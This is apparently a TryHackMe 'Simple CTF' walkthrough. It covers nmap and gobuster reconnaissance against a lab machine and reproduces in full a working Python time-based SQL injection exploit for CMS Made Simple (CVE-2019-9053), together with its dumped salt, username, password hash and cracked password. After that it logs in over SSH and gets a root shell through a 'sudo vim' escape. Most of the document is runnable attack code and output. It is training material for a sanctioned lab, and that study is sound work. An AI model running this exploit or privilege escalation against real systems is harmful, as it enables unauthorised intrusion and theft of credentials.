Simple CTF - TryHackMe

Copy 
1kali@kali:~$ sudo nmap -A -vv 10.10.229.200

Copy 
121/tcp   open  ftp     syn-ack ttl 63 vsftpd 3.0.3
2| ftp-syst:
3|   STAT:
4| FTP server status:
5|      Connected to ::ffff:10.9.2.228
6|      Logged in as ftp
7|      TYPE: ASCII
8|      No session bandwidth limit
9|      Session timeout in seconds is 300
10|      Control connection is plain text
11|      Data connections will be plain text
12|      At session startup, client count was 1
13|      vsFTPd 3.0.3 - secure, fast, stable
14|_End of status
15
1680/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
17| http-methods:
18|_  Supported Methods: GET HEAD POST OPTIONS
19| http-robots.txt: 2 disallowed entries
20|_/ /openemr-5_0_1_3
21|_http-server-header: Apache/2.4.18 (Ubuntu)
22|_http-title: Apache2 Ubuntu Default Page: It works
23
242222/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
25| ssh-hostkey:
26|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
27| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCj5RwZ5K4QU12jUD81IxGPdEmWFigjRwFNM2pVBCiIPWiMb+R82pdw5dQPFY0JjjicSysFN3pl8ea2L8acocd/7zWke6ce50tpHaDs8OdBYLfpkh+OzAsDwVWSslgKQ7rbi/ck1FF1LIgY7UQdo5FWiTMap7vFnsT/WHL3HcG5Q+el4glnO4xfMMvbRar5WZd4N0ZmcwORyXrEKvulWTOBLcoMGui95Xy7XKCkvpS9RCpJgsuNZ/oau9cdRs0gDoDLTW4S7OI9Nl5obm433k+7YwFeoLnuZnCzegEhgq/bpMo+fXTb/4ILI5bJHJQItH2Ae26iMhJjlFsMqQw0FzLf
28|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
29| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM6Q8K/lDR5QuGRzgfrQSDPYBEBcJ+/2YolisuiGuNIF+1FPOweJy9esTtstZkG3LPhwRDggCp4BP+Gmc92I3eY=
30|   256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
31|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2I73yryK/Q6UFyvBBMUJEfznlIdBXfnrEqQ3lWdymK

Copy 
1Discovered open port 21/tcp on 10.10.229.200
2Discovered open port 80/tcp on 10.10.229.200
3Discovered open port 2222/tcp on 10.10.229.200

Copy 
12

Copy 
12222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

Copy 
1ssh

Copy 
1kali@kali:~$ gobuster dir -u 10.10.229.200 -w /usr/share/wordlists/rockyou.txt

Copy 
1Disallow: /openemr-5_0_1_3

Copy 
1CVE-2019-9053

Copy 
1sqli   # (SQL Injection)

Copy 
1#!/usr/bin/env python
2# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
3# Date: 30-03-2019
4# Exploit Author: Daniele Scanu @ Certimeter Group
5# Vendor Homepage: https://www.cmsmadesimple.org/
6# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
7# Version: <= 2.2.9
8# Tested on: Ubuntu 18.04 LTS
9# CVE : CVE-2019-9053
10
11import requests
12from termcolor import colored
13import time
14from termcolor import cprint
15import optparse
16import hashlib
17
18parser = optparse.OptionParser()
19parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
20parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
21parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
22
23options, args = parser.parse_args()
24if not options.url:
25    print "[+] Specify an url target"
26    print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
27    print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
28    print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
29    exit()
30
31url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
32session = requests.Session()
33dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
34flag = True
35password = ""
36temp_password = ""
37TIME = 1
38db_name = ""
39output = ""
40email = ""
41
42salt = ''
43wordlist = ""
44if options.wordlist:
45    wordlist += options.wordlist
46
47def crack_password():
48    global password
49    global output
50    global wordlist
51    global salt
52    dict = open(wordlist)
53    for line in dict.readlines():
54        line = line.replace("\n", "")
55        beautify_print_try(line)
56        if hashlib.md5(str(salt) + line).hexdigest() == password:
57            output += "\n[+] Password cracked: " + line
58            break
59    dict.close()
60
61def beautify_print_try(value):
62    global output
63    print "\033c"
64    cprint(output,'green', attrs=['bold'])
65    cprint('[*] Try: ' + value, 'red', attrs=['bold'])
66
67def beautify_print():
68    global output
69    print "\033c"
70    cprint(output,'green', attrs=['bold'])
71
72def dump_salt():
73    global flag
74    global salt
75    global output
76    ord_salt = ""
77    ord_salt_temp = ""
78    while flag:
79        flag = False
80        for i in range(0, len(dictionary)):
81            temp_salt = salt + dictionary[i]
82            ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
83            beautify_print_try(temp_salt)
84            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
85            url = url_vuln + "&m1_idlist=" + payload
86            start_time = time.time()
87            r = session.get(url)
88            elapsed_time = time.time() - start_time
89            if elapsed_time >= TIME:
90                flag = True
91                break
92        if flag:
93            salt = temp_salt
94            ord_salt = ord_salt_temp
95    flag = True
96    output += '\n[+] Salt for password found: ' + salt
97
98def dump_password():
99    global flag
100    global password
101    global output
102    ord_password = ""
103    ord_password_temp = ""
104    while flag:
105        flag = False
106        for i in range(0, len(dictionary)):
107            temp_password = password + dictionary[i]
108            ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
109            beautify_print_try(temp_password)
110            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
111            payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
112            url = url_vuln + "&m1_idlist=" + payload
113            start_time = time.time()
114            r = session.get(url)
115            elapsed_time = time.time() - start_time
116            if elapsed_time >= TIME:
117                flag = True
118                break
119        if flag:
120            password = temp_password
121            ord_password = ord_password_temp
122    flag = True
123    output += '\n[+] Password found: ' + password
124
125def dump_username():
126    global flag
127    global db_name
128    global output
129    ord_db_name = ""
130    ord_db_name_temp = ""
131    while flag:
132        flag = False
133        for i in range(0, len(dictionary)):
134            temp_db_name = db_name + dictionary[i]
135            ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
136            beautify_print_try(temp_db_name)
137            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
138            url = url_vuln + "&m1_idlist=" + payload
139            start_time = time.time()
140            r = session.get(url)
141            elapsed_time = time.time() - start_time
142            if elapsed_time >= TIME:
143                flag = True
144                break
145        if flag:
146            db_name = temp_db_name
147            ord_db_name = ord_db_name_temp
148    output += '\n[+] Username found: ' + db_name
149    flag = True
150
151def dump_email():
152    global flag
153    global email
154    global output
155    ord_email = ""
156    ord_email_temp = ""
157    while flag:
158        flag = False
159        for i in range(0, len(dictionary)):
160            temp_email = email + dictionary[i]
161            ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
162            beautify_print_try(temp_email)
163            payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
164            url = url_vuln + "&m1_idlist=" + payload
165            start_time = time.time()
166            r = session.get(url)
167            elapsed_time = time.time() - start_time
168            if elapsed_time >= TIME:
169                flag = True
170                break
171        if flag:
172            email = temp_email
173            ord_email = ord_email_temp
174    output += '\n[+] Email found: ' + email
175    flag = True
176
177dump_salt()
178dump_username()
179dump_email()
180dump_password()
181
182if options.cracking:
183    print colored("[*] Now try to crack password")
184    crack_password()
185
186beautify_print()

Copy 
1[+] Salt for password found: 1dac0d92e9fa6bb2
2[+] Username found: mitch
3[+] Email found: admin@admin.com
4[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
5[+] Password cracked: secret

Copy 
1ssh # open ssh port 2222

Copy 
1kali@kali:~$ ssh mitch@10.10.229.200 -p 2222
2mitch@10.10.229.200's password:
3Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)
4
5 * Documentation:  https://help.ubuntu.com
6 * Management:     https://landscape.canonical.com
7 * Support:        https://ubuntu.com/advantage
8
90 packages can be updated.
100 updates are security updates.
11
12Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
13$ ls
14user.txt
15$ cat user.txt
16G00d j0b, keep up!

Copy 
1$ cd /home
2$ ls
3mitch  sunbath

Copy 
1$ sudo -l
2User mitch may run the following commands on Machine:
3    (root) NOPASSWD: /usr/bin/vim

Copy 
1$ sudo vim -c ":!/bin/sh"
2
3$ id
4uid=0(root) gid=0(root) groups=0(root)

Copy 
1$ cd /root/
2$ ls
3root.txt
4$ cat root.txt
5W3ll d0n3. You made it!